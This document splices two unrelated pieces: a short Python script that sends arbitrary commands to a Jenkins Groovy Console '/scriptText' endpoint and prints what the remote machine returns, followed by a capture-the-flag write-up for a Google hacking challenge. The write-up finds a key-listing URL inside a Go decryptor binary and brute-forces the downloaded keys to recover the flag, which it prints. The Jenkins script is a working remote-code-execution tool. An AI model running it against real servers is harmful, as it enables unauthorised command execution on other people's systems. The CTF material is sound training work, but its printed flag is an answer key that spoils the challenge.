#!/usr/bin/env python # SRC: https://raw.githubusercontent.com/bl4de/security-tools/master/jgc.py # DOC: https://medium.com/@_bl4de/remote-code-execution-with-groovy-console-in-jenkins-bd6ef55c285b from __future__ import print_function from builtins import input import requests import sys print(""" Jenkins Groovy Console cmd runner. usage: ./jgc.py [HOST] Then type any command and wait for STDOUT output from remote machine. Type 'exit' to exit :) """) URL = sys.argv[1] + '/scriptText' HEADERS = { 'User-Agent': 'jgc' } while 1: CMD = input(">> Enter command to execute (or type 'exit' to exit): ") if CMD == 'exit': print("exiting...\n") exit(0) DATA = { 'script': 'println "{}".execute().text'.format(CMD) } result = requests.post(URL, headers=HEADERS, data=DATA) print(result.text)
sec-knowleage
# Episode 1: Challenge 1 ## Description > Your files have been compromised, get them back. > > Hint: Find a way to make sense of it. An archive file was attached. ## Solution Let's extract the archive: ```console ┌──(user@kali)-[/media/…/h4ck1ng.google/EP001/Challenge_01/download] └─$ tar -xvf challenge.tar.gz flag wannacry ``` We get `flag` which looks like an encrypted blob and `wannacry` which is an executable: ```console ┌──(user@kali)-[/media/…/h4ck1ng.google/EP001/Challenge_01/download] └─$ file wannacry wannacry: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, Go BuildID=IGPSbKhPf45BQqlR84-9/XWC3eVS4fozNp9uK4nDp/_Styn3U-Z8S6ExnY6QOR/RTzNS5QnFmUHeSBeyHIu, with debug_info, not stripped ``` Running the executable (and hoping for the best) gives us the following usage: ```console ┌──(user@kali)-[/media/…/h4ck1ng.google/EP001/Challenge_01/download] └─$ ./wannacry Usage of ./wannacry: -encrypted_file string File name to decrypt. -key_file string File name of the private key. ``` `wannacry` is a `golang` executable which is usually a nightmare to reverse. After digging into the sources for who knows how long, we find the following string: ```console ┌──(user@kali)-[/media/…/h4ck1ng.google/EP001/Challenge_01/download] └─$ strings wannacry | grep "://" https://wannacry-keys-dot-gweb-h4ck1ng-g00gl3.uc.r.appspot.com/ ``` Let's access it: <details> <summary>Click to expand</summary> ```console ┌──(user@kali)-[/media/…/h4ck1ng.google/EP001/Challenge_01/download] └─$ curl https://wannacry-keys-dot-gweb-h4ck1ng-g00gl3.uc.r.appspot.com/ <pre> <a href="01087458-4d66-4677-af0d-da2024cc2111.pem">01087458-4d66-4677-af0d-da2024cc2111.pem</a> <a href="02bdbf0d-48c6-4fb5-b5d2-71be3f4f071f.pem">02bdbf0d-48c6-4fb5-b5d2-71be3f4f071f.pem</a> <a href="034fac8e-d00d-4386-b5fa-69aa9970adb5.pem">034fac8e-d00d-4386-b5fa-69aa9970adb5.pem</a> <a href="03eaf52e-f0f0-4f2b-8a2d-ab4b53c342fd.pem">03eaf52e-f0f0-4f2b-8a2d-ab4b53c342fd.pem</a> <a href="049cdf8e-449b-4632-8b89-45b9af9ecb0b.pem">049cdf8e-449b-4632-8b89-45b9af9ecb0b.pem</a> <a href="0633f3cf-4ce7-4fbf-8112-b1ca506ad7e6.pem">0633f3cf-4ce7-4fbf-8112-b1ca506ad7e6.pem</a> <a href="064971ba-02d9-4055-9cd7-fed6db11e94f.pem">064971ba-02d9-4055-9cd7-fed6db11e94f.pem</a> <a href="07161789-7e1f-4926-9ccd-1cf49c32f1bd.pem">07161789-7e1f-4926-9ccd-1cf49c32f1bd.pem</a> <a href="081a7fc6-476a-4bfb-a613-1bb37dcf723d.pem">081a7fc6-476a-4bfb-a613-1bb37dcf723d.pem</a> <a href="0b3ab9eb-44f8-4af1-99ae-f6c7666c2335.pem">0b3ab9eb-44f8-4af1-99ae-f6c7666c2335.pem</a> <a href="0cc28d8c-5bb4-4f81-9cb5-2279e79d66ca.pem">0cc28d8c-5bb4-4f81-9cb5-2279e79d66ca.pem</a> <a href="0e6a3fda-c52f-4b65-9158-7a09eb8779a5.pem">0e6a3fda-c52f-4b65-9158-7a09eb8779a5.pem</a> <a href="0f4adca3-238e-45b3-9136-9aa4c6711a46.pem">0f4adca3-238e-45b3-9136-9aa4c6711a46.pem</a> <a href="10630866-6ce8-4bf5-823b-2ad252a125dd.pem">10630866-6ce8-4bf5-823b-2ad252a125dd.pem</a> <a href="10e6c102-8165-4e26-b982-854e1a92f34b.pem">10e6c102-8165-4e26-b982-854e1a92f34b.pem</a> <a href="1236de0a-c5e1-452d-90c3-09d4b3f0dd63.pem">1236de0a-c5e1-452d-90c3-09d4b3f0dd63.pem</a> <a href="12c2f5a0-a51b-4495-bcc9-58b8f54b07d9.pem">12c2f5a0-a51b-4495-bcc9-58b8f54b07d9.pem</a> <a href="153f776e-c2c0-40f9-a584-cbbd4d828f17.pem">153f776e-c2c0-40f9-a584-cbbd4d828f17.pem</a> <a href="164285ae-bb39-4039-99e7-49ec2b624857.pem">164285ae-bb39-4039-99e7-49ec2b624857.pem</a> <a href="1701476f-1a5c-423e-83b1-13a00a2d7c45.pem">1701476f-1a5c-423e-83b1-13a00a2d7c45.pem</a> <a href="172f7908-df7c-45a1-8b72-b7cfee0f7e51.pem">172f7908-df7c-45a1-8b72-b7cfee0f7e51.pem</a> <a href="176f4a07-ee90-459d-bbce-87b2f56e33dd.pem">176f4a07-ee90-459d-bbce-87b2f56e33dd.pem</a> <a href="189ef363-1f5f-4818-a8c0-841d555d160d.pem">189ef363-1f5f-4818-a8c0-841d555d160d.pem</a> <a href="19185ee0-c482-485e-bcdf-0802a89f7375.pem">19185ee0-c482-485e-bcdf-0802a89f7375.pem</a> <a href="1953639c-bc48-478e-bd7e-e2c9f623e50a.pem">1953639c-bc48-478e-bd7e-e2c9f623e50a.pem</a> <a href="1a4849d3-8563-4c63-938d-c29c9814a1ce.pem">1a4849d3-8563-4c63-938d-c29c9814a1ce.pem</a> <a href="1ad544d8-3dfd-44bd-8131-aed07ccf0db6.pem">1ad544d8-3dfd-44bd-8131-aed07ccf0db6.pem</a> <a href="1b87713d-de29-4d60-9cd9-30c8a4d19d34.pem">1b87713d-de29-4d60-9cd9-30c8a4d19d34.pem</a> <a href="1da5f853-d79b-446f-9dba-dbff7cb12e13.pem">1da5f853-d79b-446f-9dba-dbff7cb12e13.pem</a> <a href="1ebb09f8-f0db-429a-b15f-6b4133aba67c.pem">1ebb09f8-f0db-429a-b15f-6b4133aba67c.pem</a> <a href="1f4f0db8-4a96-4eaf-94e1-540d45ae11b5.pem">1f4f0db8-4a96-4eaf-94e1-540d45ae11b5.pem</a> <a href="21f13ea0-c076-4a0f-b588-45c0de72c732.pem">21f13ea0-c076-4a0f-b588-45c0de72c732.pem</a> <a href="228aac4e-a79f-4816-ae6e-d5e13b06e267.pem">228aac4e-a79f-4816-ae6e-d5e13b06e267.pem</a> <a href="2329bc4d-c184-4244-8dd4-a9e089240f9e.pem">2329bc4d-c184-4244-8dd4-a9e089240f9e.pem</a> <a href="24bb6064-390e-4832-9369-80043456e728.pem">24bb6064-390e-4832-9369-80043456e728.pem</a> <a href="24d3e6db-2f7a-4933-9a90-0b5f06c2666a.pem">24d3e6db-2f7a-4933-9a90-0b5f06c2666a.pem</a> <a href="24ef14ea-7131-4ce3-b7f6-61aef1e8146c.pem">24ef14ea-7131-4ce3-b7f6-61aef1e8146c.pem</a> <a href="25e7d297-465c-49d8-b6fa-c8c226435f7c.pem">25e7d297-465c-49d8-b6fa-c8c226435f7c.pem</a> <a href="27caf697-81cf-47b9-9a93-180c831d1229.pem">27caf697-81cf-47b9-9a93-180c831d1229.pem</a> <a href="291eb1df-0b6b-4cac-a61f-8d679ec5eeab.pem">291eb1df-0b6b-4cac-a61f-8d679ec5eeab.pem</a> <a href="2a19914e-fa40-4fb9-98b7-66d9e755beca.pem">2a19914e-fa40-4fb9-98b7-66d9e755beca.pem</a> <a href="2a5d2c6b-604e-46a0-9f19-9b2b61b8ac47.pem">2a5d2c6b-604e-46a0-9f19-9b2b61b8ac47.pem</a> <a href="2af8ccf1-1e1a-4de2-8a46-d4a198470231.pem">2af8ccf1-1e1a-4de2-8a46-d4a198470231.pem</a> <a href="2baf7e81-af62-42f7-87d9-bd2b29ff1bc5.pem">2baf7e81-af62-42f7-87d9-bd2b29ff1bc5.pem</a> <a href="32aa4aad-74c5-4fa9-8c41-98f3d8605e97.pem">32aa4aad-74c5-4fa9-8c41-98f3d8605e97.pem</a> <a href="349a5bd4-828b-4b32-8b39-7d63c1b89bcf.pem">349a5bd4-828b-4b32-8b39-7d63c1b89bcf.pem</a> <a href="36145ba5-ccec-4370-9bd9-15ae0fb13e12.pem">36145ba5-ccec-4370-9bd9-15ae0fb13e12.pem</a> <a href="36b9ce94-98b6-4a45-9312-416a15803b8e.pem">36b9ce94-98b6-4a45-9312-416a15803b8e.pem</a> <a href="39fa5472-747b-4366-b1c9-9dac8b6a690c.pem">39fa5472-747b-4366-b1c9-9dac8b6a690c.pem</a> <a href="3bbb7af5-dd05-4415-81a2-4037a409f05e.pem">3bbb7af5-dd05-4415-81a2-4037a409f05e.pem</a> <a href="3ed701bd-ee20-410b-a392-260f6d0cc0b7.pem">3ed701bd-ee20-410b-a392-260f6d0cc0b7.pem</a> <a href="43d1fff4-55a1-4560-b441-78fa581631d8.pem">43d1fff4-55a1-4560-b441-78fa581631d8.pem</a> <a href="44b721a8-9eb2-4c91-a657-7472f952829c.pem">44b721a8-9eb2-4c91-a657-7472f952829c.pem</a> <a href="45b722d6-232e-4b0e-93d1-e44de8e0c0f6.pem">45b722d6-232e-4b0e-93d1-e44de8e0c0f6.pem</a> <a href="4891a7be-67b3-46cc-a006-fa6d17dbf76d.pem">4891a7be-67b3-46cc-a006-fa6d17dbf76d.pem</a> <a href="499b1d77-8765-413f-8a9f-d2367dfa706b.pem">499b1d77-8765-413f-8a9f-d2367dfa706b.pem</a> <a href="4b579c8a-157e-465d-b749-ef2ec42059f7.pem">4b579c8a-157e-465d-b749-ef2ec42059f7.pem</a> <a href="4bbdc015-18b1-4f72-bc1e-0cb4705fabc3.pem">4bbdc015-18b1-4f72-bc1e-0cb4705fabc3.pem</a> <a href="4bd1808f-f173-45cb-81e5-2dab83fe6a5d.pem">4bd1808f-f173-45cb-81e5-2dab83fe6a5d.pem</a> <a href="4bf9bd8b-051c-4da7-ad21-20f3b9c55f49.pem">4bf9bd8b-051c-4da7-ad21-20f3b9c55f49.pem</a> <a href="4c08f7e5-f4da-4a6b-9289-bca7a57f69fc.pem">4c08f7e5-f4da-4a6b-9289-bca7a57f69fc.pem</a> <a href="4d1017d0-372a-4c3d-a2e6-3a6b3403178d.pem">4d1017d0-372a-4c3d-a2e6-3a6b3403178d.pem</a> <a href="5280decd-9950-4617-be96-e097c64409ae.pem">5280decd-9950-4617-be96-e097c64409ae.pem</a> <a href="5323d320-4689-492c-bac0-c7c2e1986c0b.pem">5323d320-4689-492c-bac0-c7c2e1986c0b.pem</a> <a href="559261d9-485e-45d0-bae0-3d2bb1ba9e7b.pem">559261d9-485e-45d0-bae0-3d2bb1ba9e7b.pem</a> <a href="5622afe2-b918-493c-979b-3f0c961586e6.pem">5622afe2-b918-493c-979b-3f0c961586e6.pem</a> <a href="573472e4-2f12-47d5-a218-56721c0faf35.pem">573472e4-2f12-47d5-a218-56721c0faf35.pem</a> <a href="57376722-adef-4638-a127-151dc360f600.pem">57376722-adef-4638-a127-151dc360f600.pem</a> <a href="599d2f44-0447-4499-b1df-b98e6df0c91a.pem">599d2f44-0447-4499-b1df-b98e6df0c91a.pem</a> <a href="5a80a3c1-462c-4a2e-a0fd-fc3337e96c86.pem">5a80a3c1-462c-4a2e-a0fd-fc3337e96c86.pem</a> <a href="5e2e1053-86bd-437b-82f3-2536c7dbf3dc.pem">5e2e1053-86bd-437b-82f3-2536c7dbf3dc.pem</a> <a href="5f580e19-a893-4403-9564-629ad4dec3d0.pem">5f580e19-a893-4403-9564-629ad4dec3d0.pem</a> <a href="5fef6807-c477-4449-b65a-0a75487dabf4.pem">5fef6807-c477-4449-b65a-0a75487dabf4.pem</a> <a href="63761f8c-df6f-4be9-ad61-4a6e5810f60f.pem">63761f8c-df6f-4be9-ad61-4a6e5810f60f.pem</a> <a href="6412b8cd-4a0c-40db-9c4a-9e6094886651.pem">6412b8cd-4a0c-40db-9c4a-9e6094886651.pem</a> <a href="6526436a-6984-4718-8cfe-c3b099845dea.pem">6526436a-6984-4718-8cfe-c3b099845dea.pem</a> <a href="676ebfd1-0925-442a-9805-ee45b8565c7f.pem">676ebfd1-0925-442a-9805-ee45b8565c7f.pem</a> <a href="68d24dc7-e94e-4ee0-92b6-52747a52101c.pem">68d24dc7-e94e-4ee0-92b6-52747a52101c.pem</a> <a href="6aa6ebe1-5e8f-446c-878e-9eee24392782.pem">6aa6ebe1-5e8f-446c-878e-9eee24392782.pem</a> <a href="6b147d47-8d9f-46a8-9c8c-f8a4d316e2c6.pem">6b147d47-8d9f-46a8-9c8c-f8a4d316e2c6.pem</a> <a href="6be99d11-d8a0-490c-beb9-53eeb2037129.pem">6be99d11-d8a0-490c-beb9-53eeb2037129.pem</a> <a href="6c55a855-5e94-4826-9b66-7b67f5fc2ec8.pem">6c55a855-5e94-4826-9b66-7b67f5fc2ec8.pem</a> <a href="6cc85119-b16d-4bde-9421-c86206dbe1ce.pem">6cc85119-b16d-4bde-9421-c86206dbe1ce.pem</a> <a href="6d3dbf69-a2f9-405a-9376-01c679a2798e.pem">6d3dbf69-a2f9-405a-9376-01c679a2798e.pem</a> <a href="6d974e7b-2003-409d-ada7-b4a805dc2419.pem">6d974e7b-2003-409d-ada7-b4a805dc2419.pem</a> <a href="6eb04c35-0f4b-4483-aa62-e6653220136b.pem">6eb04c35-0f4b-4483-aa62-e6653220136b.pem</a> <a href="70b7e4d8-d25f-4ffe-a0b4-87cd8886eb27.pem">70b7e4d8-d25f-4ffe-a0b4-87cd8886eb27.pem</a> <a href="719924cf-cbd3-4582-ac54-e984b04d35c8.pem">719924cf-cbd3-4582-ac54-e984b04d35c8.pem</a> <a href="77444a22-6e5a-4b7f-8dec-856ba49bce43.pem">77444a22-6e5a-4b7f-8dec-856ba49bce43.pem</a> <a href="78ee817f-387e-478f-88e8-23fe103ba3da.pem">78ee817f-387e-478f-88e8-23fe103ba3da.pem</a> <a href="7c2dccc6-dedb-443d-a782-d0b68e645c7a.pem">7c2dccc6-dedb-443d-a782-d0b68e645c7a.pem</a> <a href="7cbc4f01-5940-460d-ab2c-d7a40e99ba02.pem">7cbc4f01-5940-460d-ab2c-d7a40e99ba02.pem</a> <a href="7f6f07da-ff21-4d6e-b4bc-ff04ef3dcf34.pem">7f6f07da-ff21-4d6e-b4bc-ff04ef3dcf34.pem</a> <a href="80279102-38cf-471c-ae29-34c8ea3ff4dd.pem">80279102-38cf-471c-ae29-34c8ea3ff4dd.pem</a> <a href="80848b9f-75a1-4fe1-9b30-8da7b65aa349.pem">80848b9f-75a1-4fe1-9b30-8da7b65aa349.pem</a> <a href="8099416d-eb93-4580-a899-82507d6c72ea.pem">8099416d-eb93-4580-a899-82507d6c72ea.pem</a> <a href="8164651e-66f2-41ef-b797-7ef14de9a7d6.pem">8164651e-66f2-41ef-b797-7ef14de9a7d6.pem</a> <a href="83176131-9099-4798-a0ee-47937a54a81b.pem">83176131-9099-4798-a0ee-47937a54a81b.pem</a> <a href="84c40826-ccb3-493a-80be-da830d4f19b0.pem">84c40826-ccb3-493a-80be-da830d4f19b0.pem</a> <a href="84ca2346-8c73-4a64-9a19-59546f85d69f.pem">84ca2346-8c73-4a64-9a19-59546f85d69f.pem</a> <a href="859156de-0b31-43ae-ba05-574e4a2fd6ae.pem">859156de-0b31-43ae-ba05-574e4a2fd6ae.pem</a> <a href="85cdeeaf-dd00-4895-b170-06d3382fdfdd.pem">85cdeeaf-dd00-4895-b170-06d3382fdfdd.pem</a> <a href="878c00b1-b8fa-4308-a330-19b23c5bfe16.pem">878c00b1-b8fa-4308-a330-19b23c5bfe16.pem</a> <a href="8ad71d57-82b0-4d8d-8442-d62701e20b88.pem">8ad71d57-82b0-4d8d-8442-d62701e20b88.pem</a> <a href="8c8119f3-fafc-4469-b7af-53f5a17ccd25.pem">8c8119f3-fafc-4469-b7af-53f5a17ccd25.pem</a> <a href="8cc306bc-9f7b-44eb-994c-990603b7611a.pem">8cc306bc-9f7b-44eb-994c-990603b7611a.pem</a> <a href="8db4fa13-4243-4c02-8138-3e786bbbf52b.pem">8db4fa13-4243-4c02-8138-3e786bbbf52b.pem</a> <a href="8fbef6c2-3935-494c-8f73-93586913109d.pem">8fbef6c2-3935-494c-8f73-93586913109d.pem</a> <a href="90550add-02f3-4ddc-a7e3-20dc405d360a.pem">90550add-02f3-4ddc-a7e3-20dc405d360a.pem</a> <a href="91aa2eb4-3f36-426f-9114-1c1bb6b96496.pem">91aa2eb4-3f36-426f-9114-1c1bb6b96496.pem</a> <a href="9309d9bd-0800-4c0c-acdb-e0711354053b.pem">9309d9bd-0800-4c0c-acdb-e0711354053b.pem</a> <a href="93c4fd75-5509-47cc-9110-6049fb5016ca.pem">93c4fd75-5509-47cc-9110-6049fb5016ca.pem</a> <a href="9546cc5e-6f5e-442c-b0f1-d801e4d19b50.pem">9546cc5e-6f5e-442c-b0f1-d801e4d19b50.pem</a> <a href="9593294a-7b03-4915-a639-c4572c82110c.pem">9593294a-7b03-4915-a639-c4572c82110c.pem</a> <a href="962eef6c-77bf-4d0b-ad0d-9e8807b6d458.pem">962eef6c-77bf-4d0b-ad0d-9e8807b6d458.pem</a> <a href="96bea50b-07a9-4194-bf3c-f30b7a121b0e.pem">96bea50b-07a9-4194-bf3c-f30b7a121b0e.pem</a> <a href="983b5981-903a-4930-a06a-8f5fc2c626d8.pem">983b5981-903a-4930-a06a-8f5fc2c626d8.pem</a> <a href="995fd2e3-8c08-4337-9421-945cc3dfe9ab.pem">995fd2e3-8c08-4337-9421-945cc3dfe9ab.pem</a> <a href="9afe1a19-3caf-458a-a312-825a4792fc2f.pem">9afe1a19-3caf-458a-a312-825a4792fc2f.pem</a> <a href="9b39314b-d277-49ba-a644-acbcad3368c7.pem">9b39314b-d277-49ba-a644-acbcad3368c7.pem</a> <a href="9fc31583-ab33-4e79-a4fd-772928711ff6.pem">9fc31583-ab33-4e79-a4fd-772928711ff6.pem</a> <a href="a126752d-0e7a-49ee-b6d7-6649e8f2cd0e.pem">a126752d-0e7a-49ee-b6d7-6649e8f2cd0e.pem</a> <a href="a20d7b0f-682c-411e-97a2-fc00bdfb1ee0.pem">a20d7b0f-682c-411e-97a2-fc00bdfb1ee0.pem</a> <a href="a3a79311-9caf-40f9-a2b5-1ae24c38e688.pem">a3a79311-9caf-40f9-a2b5-1ae24c38e688.pem</a> <a href="a436bd5e-d273-4b1d-82cd-c4158307fe71.pem">a436bd5e-d273-4b1d-82cd-c4158307fe71.pem</a> <a href="a4bff653-a907-40df-a2bd-3d4a4368f884.pem">a4bff653-a907-40df-a2bd-3d4a4368f884.pem</a> <a href="a4f7dc6d-f044-4c5e-b792-6a3fc1658dcd.pem">a4f7dc6d-f044-4c5e-b792-6a3fc1658dcd.pem</a> <a href="a64d9d7a-19a7-4ae3-9305-fc2b02eabf48.pem">a64d9d7a-19a7-4ae3-9305-fc2b02eabf48.pem</a> <a href="a65b053c-f41b-4e0c-846c-0306084b0af6.pem">a65b053c-f41b-4e0c-846c-0306084b0af6.pem</a> <a href="a6e5c9bc-1060-42bd-b731-52f2ba6c1af5.pem">a6e5c9bc-1060-42bd-b731-52f2ba6c1af5.pem</a> <a href="a7d59e34-1099-4a30-80f2-69b86d072111.pem">a7d59e34-1099-4a30-80f2-69b86d072111.pem</a> <a href="a858c8d8-e1a5-496e-81f5-68f312254666.pem">a858c8d8-e1a5-496e-81f5-68f312254666.pem</a> <a href="a8f60f8a-2f39-4efc-95f3-33e1ec1f9359.pem">a8f60f8a-2f39-4efc-95f3-33e1ec1f9359.pem</a> <a href="a8f860e7-34d3-4e67-a49b-0cac10602c0e.pem">a8f860e7-34d3-4e67-a49b-0cac10602c0e.pem</a> <a href="a9593d5d-f09f-4083-9bc3-38c2f3dfadcb.pem">a9593d5d-f09f-4083-9bc3-38c2f3dfadcb.pem</a> <a href="aa4bde0e-4bbb-4eb0-a5d4-b244999bf1e0.pem">aa4bde0e-4bbb-4eb0-a5d4-b244999bf1e0.pem</a> <a href="aaf71a47-5582-4573-84bc-4beafbde3c48.pem">aaf71a47-5582-4573-84bc-4beafbde3c48.pem</a> <a href="ab85b731-0476-441b-a65a-ba96f0146a1b.pem">ab85b731-0476-441b-a65a-ba96f0146a1b.pem</a> <a href="adb3d852-b17e-4b19-8b31-75625541df6d.pem">adb3d852-b17e-4b19-8b31-75625541df6d.pem</a> <a href="b1c81569-221b-44d1-9348-41a3a66914fd.pem">b1c81569-221b-44d1-9348-41a3a66914fd.pem</a> <a href="b267d9e7-872e-48c4-a479-7f65dd3b5ada.pem">b267d9e7-872e-48c4-a479-7f65dd3b5ada.pem</a> <a href="b3406e1e-49cc-4916-8340-b217652ad458.pem">b3406e1e-49cc-4916-8340-b217652ad458.pem</a> <a href="b54f662e-2ca1-436e-83fd-ccad0b51f44c.pem">b54f662e-2ca1-436e-83fd-ccad0b51f44c.pem</a> <a href="b5cc7de4-2c82-451f-82bb-0366dcaccf94.pem">b5cc7de4-2c82-451f-82bb-0366dcaccf94.pem</a> <a href="b666fac8-1c12-4091-930f-f2e47ba6a223.pem">b666fac8-1c12-4091-930f-f2e47ba6a223.pem</a> <a href="b9c44ca9-bef8-4142-b6e0-cbe407835194.pem">b9c44ca9-bef8-4142-b6e0-cbe407835194.pem</a> <a href="b9e65101-3a5f-41c4-8a95-0b7cb8e8045d.pem">b9e65101-3a5f-41c4-8a95-0b7cb8e8045d.pem</a> <a href="ba4ec3be-41f2-4c86-81e7-3d7363cba412.pem">ba4ec3be-41f2-4c86-81e7-3d7363cba412.pem</a> <a href="bbc0ef99-8032-4cf2-83c0-d959598db63b.pem">bbc0ef99-8032-4cf2-83c0-d959598db63b.pem</a> <a href="c0f7145b-ea98-4769-8fe3-360d57d98a52.pem">c0f7145b-ea98-4769-8fe3-360d57d98a52.pem</a> <a href="c4a941cb-fef0-418a-9e9e-7519dc8ddc6f.pem">c4a941cb-fef0-418a-9e9e-7519dc8ddc6f.pem</a> <a href="c76aff1d-0401-4c0e-a30d-137262e0313a.pem">c76aff1d-0401-4c0e-a30d-137262e0313a.pem</a> <a href="c81bd58d-eaa6-491b-84ac-0d03d575a10a.pem">c81bd58d-eaa6-491b-84ac-0d03d575a10a.pem</a> <a href="c8643dfb-a150-4369-8642-93dd1f4a3b55.pem">c8643dfb-a150-4369-8642-93dd1f4a3b55.pem</a> <a href="c8e6c2f8-a060-47fd-a550-83580dedc984.pem">c8e6c2f8-a060-47fd-a550-83580dedc984.pem</a> <a href="cbfcaf51-8943-4066-b2aa-c46cd318377b.pem">cbfcaf51-8943-4066-b2aa-c46cd318377b.pem</a> <a href="cd6f7b94-b41c-4eac-89b4-a1f3435bc86b.pem">cd6f7b94-b41c-4eac-89b4-a1f3435bc86b.pem</a> <a href="ce3bfd75-1b24-40f6-bdec-a36d06be5353.pem">ce3bfd75-1b24-40f6-bdec-a36d06be5353.pem</a> <a href="ce3ce8c7-eedd-4a53-876d-094836607337.pem">ce3ce8c7-eedd-4a53-876d-094836607337.pem</a> <a href="cf6cf41b-eb58-480a-bee5-03b919aec40e.pem">cf6cf41b-eb58-480a-bee5-03b919aec40e.pem</a> <a href="d0b9e45f-9ec7-45cc-8362-60bb9b978f4c.pem">d0b9e45f-9ec7-45cc-8362-60bb9b978f4c.pem</a> <a href="d18bf454-fa96-45f6-868a-f763aba2b492.pem">d18bf454-fa96-45f6-868a-f763aba2b492.pem</a> <a href="d2431efe-c616-4de5-87e1-a4fc50a14317.pem">d2431efe-c616-4de5-87e1-a4fc50a14317.pem</a> <a href="d28edffe-c1ef-42f0-bd94-c463f854a1b0.pem">d28edffe-c1ef-42f0-bd94-c463f854a1b0.pem</a> <a href="d31eb679-c6eb-4e17-98ee-c1693391db51.pem">d31eb679-c6eb-4e17-98ee-c1693391db51.pem</a> <a href="d4c56a4b-96e4-4335-91bf-ac3dd66d7f60.pem">d4c56a4b-96e4-4335-91bf-ac3dd66d7f60.pem</a> <a href="d67466fd-e913-4794-b16f-d34651f73b72.pem">d67466fd-e913-4794-b16f-d34651f73b72.pem</a> <a href="d7f58408-4b64-4e02-bf3f-89e7d9d0c4bc.pem">d7f58408-4b64-4e02-bf3f-89e7d9d0c4bc.pem</a> <a href="dbd69e04-37e0-45fa-a9a3-8b496f88d675.pem">dbd69e04-37e0-45fa-a9a3-8b496f88d675.pem</a> <a href="dc16ea40-8f13-4dac-b482-7d22a49b27c9.pem">dc16ea40-8f13-4dac-b482-7d22a49b27c9.pem</a> <a href="dcfe92cc-22f8-421e-8152-c71a1e3b37da.pem">dcfe92cc-22f8-421e-8152-c71a1e3b37da.pem</a> <a href="ddf3100b-71c6-430c-bf28-01ea930619c5.pem">ddf3100b-71c6-430c-bf28-01ea930619c5.pem</a> <a href="e04ae4a5-56bd-4c31-a477-81d1ccb7b48e.pem">e04ae4a5-56bd-4c31-a477-81d1ccb7b48e.pem</a> <a href="e169416c-ef78-4d6e-8004-32eb699753e0.pem">e169416c-ef78-4d6e-8004-32eb699753e0.pem</a> <a href="e2e12c47-9e5d-40d9-863c-2b7d744f640c.pem">e2e12c47-9e5d-40d9-863c-2b7d744f640c.pem</a> <a href="e3862877-0efd-4f6b-a4d4-df98f0fe04cc.pem">e3862877-0efd-4f6b-a4d4-df98f0fe04cc.pem</a> <a href="e4db6159-cba8-4ae2-9ae1-ab99236b2f22.pem">e4db6159-cba8-4ae2-9ae1-ab99236b2f22.pem</a> <a href="e6df51c0-47c5-4823-980f-552d5dc31010.pem">e6df51c0-47c5-4823-980f-552d5dc31010.pem</a> <a href="e70e3a6e-42c5-4361-8df2-b971cf95df19.pem">e70e3a6e-42c5-4361-8df2-b971cf95df19.pem</a> <a href="e7324b29-7939-466a-b2a9-2e84b11c8a1a.pem">e7324b29-7939-466a-b2a9-2e84b11c8a1a.pem</a> <a href="ecb3e334-b7c7-47cd-8a4a-454bf2f91ce7.pem">ecb3e334-b7c7-47cd-8a4a-454bf2f91ce7.pem</a> <a href="ecbce52a-fafa-4d99-8ef0-439c9990fb40.pem">ecbce52a-fafa-4d99-8ef0-439c9990fb40.pem</a> <a href="ecdb6514-1e6c-4b49-817c-c6beca355143.pem">ecdb6514-1e6c-4b49-817c-c6beca355143.pem</a> <a href="edcacdf2-45d1-475d-8444-18c7d0f1ebd3.pem">edcacdf2-45d1-475d-8444-18c7d0f1ebd3.pem</a> <a href="ef48a8aa-7be8-4fd0-a9cb-a34533a592f7.pem">ef48a8aa-7be8-4fd0-a9cb-a34533a592f7.pem</a> <a href="f0be5612-29e0-4ba0-8a1b-b4fc38616b39.pem">f0be5612-29e0-4ba0-8a1b-b4fc38616b39.pem</a> <a href="f277f460-1426-4e5f-a17d-e7edbc2bff0b.pem">f277f460-1426-4e5f-a17d-e7edbc2bff0b.pem</a> <a href="f3f419a3-aa6b-4df4-bd5b-66ff2a668a15.pem">f3f419a3-aa6b-4df4-bd5b-66ff2a668a15.pem</a> <a href="f500b39d-6a15-4f82-b114-78fc441f4895.pem">f500b39d-6a15-4f82-b114-78fc441f4895.pem</a> <a href="f53adb60-3efa-44c8-9de4-a6bb79e2255f.pem">f53adb60-3efa-44c8-9de4-a6bb79e2255f.pem</a> <a href="f62c9e27-65f4-455a-8691-adc29e17cc07.pem">f62c9e27-65f4-455a-8691-adc29e17cc07.pem</a> <a href="f8218e55-15a1-4797-bafa-e28c14edb5da.pem">f8218e55-15a1-4797-bafa-e28c14edb5da.pem</a> <a href="f84381c8-9294-4863-b251-2bf954a0515b.pem">f84381c8-9294-4863-b251-2bf954a0515b.pem</a> <a href="f861f8dc-a50a-4925-8fd7-594bda9fd0bc.pem">f861f8dc-a50a-4925-8fd7-594bda9fd0bc.pem</a> <a href="fac61466-7cbc-4177-b195-3c9c84118666.pem">fac61466-7cbc-4177-b195-3c9c84118666.pem</a> <a href="face5561-5ac4-47ab-aa8a-aa6eadfc0aae.pem">face5561-5ac4-47ab-aa8a-aa6eadfc0aae.pem</a> <a href="faeb6888-c840-4989-8d2c-4707e0ccdf28.pem">faeb6888-c840-4989-8d2c-4707e0ccdf28.pem</a> <a href="fcf65009-7231-4db8-82be-7e5780a8732f.pem">fcf65009-7231-4db8-82be-7e5780a8732f.pem</a> <a href="fd838526-3deb-41b2-8b01-4f64bdfef33f.pem">fd838526-3deb-41b2-8b01-4f64bdfef33f.pem</a> <a href="ff937b71-5298-4bbe-ab65-897b11c274b2.pem">ff937b71-5298-4bbe-ab65-897b11c274b2.pem</a> </pre> ``` </details> Looks like we have lots of keys, let's just try them all: ```bash #!/bin/bash curl https://wannacry-keys-dot-gweb-h4ck1ng-g00gl3.uc.r.appspot.com/ -s | grep href | grep -Po '(?<=href=")[^"]*' | while read key; do key_content=$(curl -s "https://wannacry-keys-dot-gweb-h4ck1ng-g00gl3.uc.r.appspot.com/$key" --output -) output=$(./wannacry -encrypted_file flag -key_file <(echo "$key_content") | tr -d '\0' ) if [[ $output == *"solve"* ]]; then echo "Key: $key" echo "Flag: $output" break fi done ``` Output: ```console ┌──(user@kali)-[/media/…/h4ck1ng.google/EP001/Challenge_01/download] └─$ ./solve.sh Key: 2baf7e81-af62-42f7-87d9-bd2b29ff1bc5.pem Flag: https://h4ck1ng.google/solve/CrY_n0_m0r3 ```
sec-knowleage
